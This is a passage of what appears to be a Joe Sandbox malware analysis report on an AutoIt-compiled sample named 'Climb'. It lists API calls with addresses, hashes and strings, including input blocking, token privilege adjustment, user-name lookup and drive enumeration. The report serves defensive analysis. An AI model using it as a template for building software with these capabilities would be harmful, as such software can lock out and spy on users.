                                                                                                                                                                      • TerminateProcess.KERNEL32(00000000,?,0051502E,?,005B98D8,0000000C,00515185,?,00000002,00000000), ref: 00515080
                                                                                                                                                                      • ExitProcess.KERNEL32 ref: 00515092
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Process$CurrentExitTerminate
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1703294689-0
                                                                                                                                                                      • Opcode ID: 8c30b9854fb35e172536b1c53d6d8ae4a2f2252a20ab7fe961f539fa9c56b7a3
                                                                                                                                                                      • Instruction ID: 1ef02eec2e692074be96856945a2ee9f63b9abb035387cc39aff6d79da22f947
                                                                                                                                                                      • Opcode Fuzzy Hash: 8c30b9854fb35e172536b1c53d6d8ae4a2f2252a20ab7fe961f539fa9c56b7a3
                                                                                                                                                                      • Instruction Fuzzy Hash: A4E09231400648AFDB216F94DD0DA983FB9BFA5381B114414F849AA1A1EB359986DB90
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetUserNameW.ADVAPI32(?,?), ref: 0054E664
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: NameUser
                                                                                                                                                                      • String ID: X64
                                                                                                                                                                      • API String ID: 2645101109-893830106
                                                                                                                                                                      • Opcode ID: c23e6943d6c32d14806a2ae849ab0fa35c39eb1591ba6ebc1f4bef934b1b9f65
                                                                                                                                                                      • Instruction ID: 23d21b892ed12e64c21008b71e0db5977fe583f4bcdf89708870e99feced47ab
                                                                                                                                                                      • Opcode Fuzzy Hash: c23e6943d6c32d14806a2ae849ab0fa35c39eb1591ba6ebc1f4bef934b1b9f65
                                                                                                                                                                      • Instruction Fuzzy Hash: 9DD0C9B480511DEACF80CB90EC8CDDD77BCBB14304F100A51F506A2040D73095489B20
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,005752EE,?,?,00000035,?), ref: 00564229
                                                                                                                                                                      • FormatMessageW.KERNEL32(00001000,00000000,?,00000000,?,00000FFF,00000000,?,?,?,005752EE,?,?,00000035,?), ref: 00564239
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ErrorFormatLastMessage
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3479602957-0
                                                                                                                                                                      • Opcode ID: 4467cf38ad4f14286b6c6c92c6712d6aa1969fab3f09b4797500e9bf817b578f
                                                                                                                                                                      • Instruction ID: 59e16f45905760de416e23afd5b833dd5f56a5f8ee6cb5140d44b41a371241c2
                                                                                                                                                                      • Opcode Fuzzy Hash: 4467cf38ad4f14286b6c6c92c6712d6aa1969fab3f09b4797500e9bf817b578f
                                                                                                                                                                      • Instruction Fuzzy Hash: 80F0A0746002296AE72016A6AC4DFEB3BADFFC5761F100165B905E3185D960990487B0
                                                                                                                                                                      APIs
                                                                                                                                                                      • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00551B48), ref: 00551A20
                                                                                                                                                                      • CloseHandle.KERNEL32(?,?,00551B48), ref: 00551A35
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AdjustCloseHandlePrivilegesToken
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 81990902-0
                                                                                                                                                                      • Opcode ID: 6341eb94f95bd8d726d6968801eed7e71b9c14ebe129ebada3565bc9d9713a57
                                                                                                                                                                      • Instruction ID: 4d86e48bb36b3caeb3aff96315207c3b1c1cce4269120ab5d9384dfa485f3d5e
                                                                                                                                                                      • Opcode Fuzzy Hash: 6341eb94f95bd8d726d6968801eed7e71b9c14ebe129ebada3565bc9d9713a57
                                                                                                                                                                      • Instruction Fuzzy Hash: 2EE01A72044611BEF7252B10FC09FB27BE9FB04321F24881EF895804B0EAA26CD0EB50
                                                                                                                                                                      APIs
                                                                                                                                                                      • BlockInput.USER32(00000001), ref: 0056F51A
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: BlockInput
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3456056419-0
                                                                                                                                                                      • Opcode ID: 10ae80a49dc1e6b1e8ec12de883f1809359ea7f671f61bef70c0ca09dd77a1ea
                                                                                                                                                                      • Instruction ID: 1ed4893f118b3987de9ff54e2ed5879714325c62273c4d06c5571590528d43bc
                                                                                                                                                                      • Opcode Fuzzy Hash: 10ae80a49dc1e6b1e8ec12de883f1809359ea7f671f61bef70c0ca09dd77a1ea
                                                                                                                                                                      • Instruction Fuzzy Hash: 70E092312002085FC710DF6AE400956BBE8AFA4761B00842AF94AC7251D670AC448BA1
                                                                                                                                                                      APIs
                                                                                                                                                                      • mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 0055EC95
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: mouse_event
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2434400541-0
                                                                                                                                                                      • Opcode ID: 877c92e7dba3463ab4fe3d1c12d1cf0793745125caf3f4f4c85b0678dffd73a1
                                                                                                                                                                      • Instruction ID: 67a4df4ac489e6d21f5c1de0034d2c30a5cdfdd7d4349aa7a2010fbb1cb64d59
                                                                                                                                                                      • Opcode Fuzzy Hash: 877c92e7dba3463ab4fe3d1c12d1cf0793745125caf3f4f4c85b0678dffd73a1
                                                                                                                                                                      • Instruction Fuzzy Hash: 06D017B619820169E81C0A3C8B3FE360E4AB302743F80574BF902E5595E481DF0CA221
                                                                                                                                                                      APIs
                                                                                                                                                                      • SetUnhandledExceptionFilter.KERNEL32(Function_00020D51,0051075E), ref: 00510D4A
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ExceptionFilterUnhandled
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3192549508-0
                                                                                                                                                                      • Opcode ID: 7a39001958e63ae0d5a636af19384635842d051190ee7b0b176bdffeca89271d
                                                                                                                                                                      • Instruction ID: ffd64a20e684c7d26363840b31ce048bc04ebce7e7ffc41f22c9294334bf4b55
                                                                                                                                                                      • Opcode Fuzzy Hash: 7a39001958e63ae0d5a636af19384635842d051190ee7b0b176bdffeca89271d
                                                                                                                                                                      • Instruction Fuzzy Hash:
                                                                                                                                                                      APIs
                                                                                                                                                                      • DeleteObject.GDI32(00000000), ref: 0057358D
                                                                                                                                                                      • DeleteObject.GDI32(00000000), ref: 005735A0
                                                                                                                                                                      • DestroyWindow.USER32 ref: 005735AF
                                                                                                                                                                      • GetDesktopWindow.USER32 ref: 005735CA
                                                                                                                                                                      • GetWindowRect.USER32(00000000), ref: 005735D1
                                                                                                                                                                      • SetRect.USER32(?,00000000,00000000,00000007,00000002), ref: 00573700
                                                                                                                                                                      • AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 0057370E
                                                                                                                                                                      • CreateWindowExW.USER32(?,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00573755
                                                                                                                                                                      • GetClientRect.USER32(00000000,?), ref: 00573761
                                                                                                                                                                      • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 0057379D
                                                                                                                                                                      • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 005737BF
                                                                                                                                                                      • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 005737D2
                                                                                                                                                                      • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 005737DD
                                                                                                                                                                      • GlobalLock.KERNEL32(00000000), ref: 005737E6
                                                                                                                                                                      • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 005737F5
                                                                                                                                                                      • GlobalUnlock.KERNEL32(00000000), ref: 005737FE
                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00573805
                                                                                                                                                                      • GlobalFree.KERNEL32(00000000), ref: 00573810
                                                                                                                                                                      • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00573822
                                                                                                                                                                      • OleLoadPicture.OLEAUT32(?,00000000,00000000,00590C04,00000000), ref: 00573838
                                                                                                                                                                      • GlobalFree.KERNEL32(00000000), ref: 00573848
                                                                                                                                                                      • CopyImage.USER32(00000007,00000000,00000000,00000000,00002000), ref: 0057386E
                                                                                                                                                                      • SendMessageW.USER32(00000000,00000172,00000000,00000007), ref: 0057388D
                                                                                                                                                                      • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 005738AF
                                                                                                                                                                      • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00573A9C
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                                                                                                                                      • String ID: $AutoIt v3$DISPLAY$static
                                                                                                                                                                      • API String ID: 2211948467-2373415609
                                                                                                                                                                      • Opcode ID: 64fc09b04ce7828dfc9d5cc40936baee4695382d124904c626fa3340dcca55cb
                                                                                                                                                                      • Instruction ID: 35b5b9b71f0d32d4882274fa387d160de2b607dc1875861226f59165792f0422
                                                                                                                                                                      • Opcode Fuzzy Hash: 64fc09b04ce7828dfc9d5cc40936baee4695382d124904c626fa3340dcca55cb
                                                                                                                                                                      • Instruction Fuzzy Hash: 50028071500209AFDB14DF65DD89EAE7BB9FF48720F008519F905AB2A0DB74AD05EF60
                                                                                                                                                                      APIs
                                                                                                                                                                      • DestroyWindow.USER32(?,?), ref: 004F16B4
                                                                                                                                                                      • SendMessageW.USER32(?,00001308,?,00000000), ref: 00532B07
                                                                                                                                                                      • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00532B40
                                                                                                                                                                      • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00532F85
                                                                                                                                                                        • Part of subcall function 004F1802: InvalidateRect.USER32(?,00000000,00000001,?,?,?,004F1488,?,00000000,?,?,?,?,004F145A,00000000,?), ref: 004F1865
                                                                                                                                                                      • SendMessageW.USER32(?,00001053), ref: 00532FC1
                                                                                                                                                                      • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00532FD8
                                                                                                                                                                      • ImageList_Destroy.COMCTL32(00000000,?), ref: 00532FEE
                                                                                                                                                                      • ImageList_Destroy.COMCTL32(00000000,?), ref: 00532FF9
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: DestroyImageList_MessageSend$Window$InvalidateMoveRectRemove
                                                                                                                                                                      • String ID: 0$(\$(\$(\
                                                                                                                                                                      • API String ID: 2760611726-2692967735
                                                                                                                                                                      • Opcode ID: ce4a72a2577c37f9a64a75b38c08b7928e081b51cc2aeb9264e0ae402035e5d2
                                                                                                                                                                      • Instruction ID: 16d60ebcca91c19d0469e74a90f226ed18a652193c9cee5864a691b90a340512
                                                                                                                                                                      • Opcode Fuzzy Hash: ce4a72a2577c37f9a64a75b38c08b7928e081b51cc2aeb9264e0ae402035e5d2
                                                                                                                                                                      • Instruction Fuzzy Hash: 8412B930204A05EFDB25DF14C888BBABBF5FB54304F18856EE585DB261C735AC86EB91
                                                                                                                                                                      APIs
                                                                                                                                                                      • DestroyWindow.USER32(00000000), ref: 0057319B
                                                                                                                                                                      • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 005732C7
                                                                                                                                                                      • SetRect.USER32(?,00000000,00000000,0000012C,?), ref: 00573306
                                                                                                                                                                      • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 00573316
                                                                                                                                                                      • CreateWindowExW.USER32(00000008,AutoIt v3,?,88C00000,000000FF,?,?,?,00000000,00000000,00000000), ref: 0057335D
                                                                                                                                                                      • GetClientRect.USER32(00000000,?), ref: 00573369
                                                                                                                                                                      • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000), ref: 005733B2
                                                                                                                                                                      • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 005733C1
                                                                                                                                                                      • GetStockObject.GDI32(00000011), ref: 005733D1
                                                                                                                                                                      • SelectObject.GDI32(00000000,00000000), ref: 005733D5
                                                                                                                                                                      • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?), ref: 005733E5
                                                                                                                                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 005733EE
                                                                                                                                                                      • DeleteDC.GDI32(00000000), ref: 005733F7
                                                                                                                                                                      • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00573423
                                                                                                                                                                      • SendMessageW.USER32(00000030,00000000,00000001), ref: 0057343A
                                                                                                                                                                      • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,-0000001D,00000104,00000014,00000000,00000000,00000000), ref: 0057347A
                                                                                                                                                                      • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 0057348E
                                                                                                                                                                      • SendMessageW.USER32(00000404,00000001,00000000), ref: 0057349F
                                                                                                                                                                      • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000041,00000500,-00000027,00000000,00000000,00000000), ref: 005734D4
                                                                                                                                                                      • GetStockObject.GDI32(00000011), ref: 005734DF
                                                                                                                                                                      • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 005734EA
                                                                                                                                                                      • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?,?,?), ref: 005734F4
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                                                                                                                                      • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                                                                                                                                      • API String ID: 2910397461-517079104
                                                                                                                                                                      • Opcode ID: c89fa4662d23a72977c03b64285312fc1a4a0a33fc79f7c57d70271a0ae501c4
                                                                                                                                                                      • Instruction ID: 9fa11b1325f6a83d5b83c6339a5f2386b90abd88b55c9527db4297dfcea52bbb
                                                                                                                                                                      • Opcode Fuzzy Hash: c89fa4662d23a72977c03b64285312fc1a4a0a33fc79f7c57d70271a0ae501c4
                                                                                                                                                                      • Instruction Fuzzy Hash: 0EB16C71A00209AFEB14DFA8DD49FAA7BB9FB18710F008519FA15E72D0D774AD04DBA4
                                                                                                                                                                      APIs
                                                                                                                                                                      • SetErrorMode.KERNEL32(00000001), ref: 00565532
                                                                                                                                                                      • GetDriveTypeW.KERNEL32(?,0058DC30,?,\\.\,0058DCD0), ref: 0056560F
                                                                                                                                                                      • SetErrorMode.KERNEL32(00000000,0058DC30,?,\\.\,0058DCD0), ref: 0056577B
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ErrorMode$DriveType
                                                                                                                                                                      • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                                                                                                                      • API String ID: 2907320926-4222207086
                                                                                                                                                                      • Opcode ID: 8f505b5959461d27ae8b52f4f17404fbc8d5dc4e55e54625c4f98a7afa5161a4
                                                                                                                                                                      • Instruction ID: 4ee0510024da1e0098a61817ce5c5de3477589a5e98e18248761420ff1a6dd44
                                                                                                                                                                      • Opcode Fuzzy Hash: 8f505b5959461d27ae8b52f4f17404fbc8d5dc4e55e54625c4f98a7afa5161a4
                                                                                                                                                                      • Instruction Fuzzy Hash: 4461F630684A0DDFC724DF24C9969B87FB1FF98394F24845AE506AB291E731EE41CB51
                                                                                                                                                                      APIs
                                                                                                                                                                      • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 004F25F8
                                                                                                                                                                      • GetSystemMetrics.USER32(00000007), ref: 004F2600
                                                                                                                                                                      • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 004F262B
                                                                                                                                                                      • GetSystemMetrics.USER32(00000008), ref: 004F2633
                                                                                                                                                                      • GetSystemMetrics.USER32(00000004), ref: 004F2658
                                                                                                                                                                      • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 004F2675
                                                                                                                                                                      • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 004F2685
                                                                                                                                                                      • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 004F26B8
                                                                                                                                                                      • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 004F26CC
                                                                                                                                                                      • GetClientRect.USER32(00000000,000000FF), ref: 004F26EA
                                                                                                                                                                      • GetStockObject.GDI32(00000011), ref: 004F2706
                                                                                                                                                                      • SendMessageW.USER32(00000000,00000030,00000000), ref: 004F2711
                                                                                                                                                                        • Part of subcall function 004F19CD: GetCursorPos.USER32(?), ref: 004F19E1
                                                                                                                                                                        • Part of subcall function 004F19CD: ScreenToClient.USER32(00000000,?), ref: 004F19FE
                                                                                                                                                                        • Part of subcall function 004F19CD: GetAsyncKeyState.USER32(00000001), ref: 004F1A23
                                                                                                                                                                        • Part of subcall function 004F19CD: GetAsyncKeyState.USER32(00000002), ref: 004F1A3D
                                                                                                                                                                      • SetTimer.USER32(00000000,00000000,00000028,004F199C), ref: 004F2738
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
